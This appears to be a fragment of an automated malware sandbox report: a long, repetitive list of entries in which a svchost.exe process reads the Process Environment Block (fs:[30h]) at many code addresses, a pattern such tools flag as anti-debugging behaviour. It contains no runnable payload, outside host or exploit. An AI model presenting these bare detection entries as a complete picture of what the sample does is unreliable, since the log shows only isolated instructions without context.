Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]	2_2_02F62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]	2_2_02F4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]	2_2_02F4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]	2_2_02F66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]	2_2_02F68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]	2_2_02F3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]	2_2_02F72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]	2_2_02FAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_02FBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]	2_2_02FB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]	2_2_02F307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]	2_2_02FE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]	2_2_02FD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]	2_2_02F38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]	2_2_02F30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]	2_2_02FBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]	2_2_02FB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]	2_2_02FAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]	2_2_02F30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]	2_2_02F60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]	2_2_02F6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]	2_2_02F304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]	2_2_02F644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_02FBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]	2_2_02F364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]	2_2_02FEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]	2_2_02FBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]	2_2_02FEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]	2_2_02F2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]	2_2_02F5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]	2_2_02F6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]	2_2_02F2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]	2_2_02F325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]	2_2_02F365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]	2_2_02F6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]	2_2_02F64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]	2_2_02FC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]	2_2_03004B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]	2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]	2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]	2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]	2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]	2_2_02F86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]	2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]	2_2_02FDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]	2_2_02F5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]	2_2_02FBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]	2_2_02F5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_02FDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]	2_2_03004A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]	2_2_02F2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]	2_2_02F28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]	2_2_02FDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]	2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]	2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]	2_2_02FFAB40
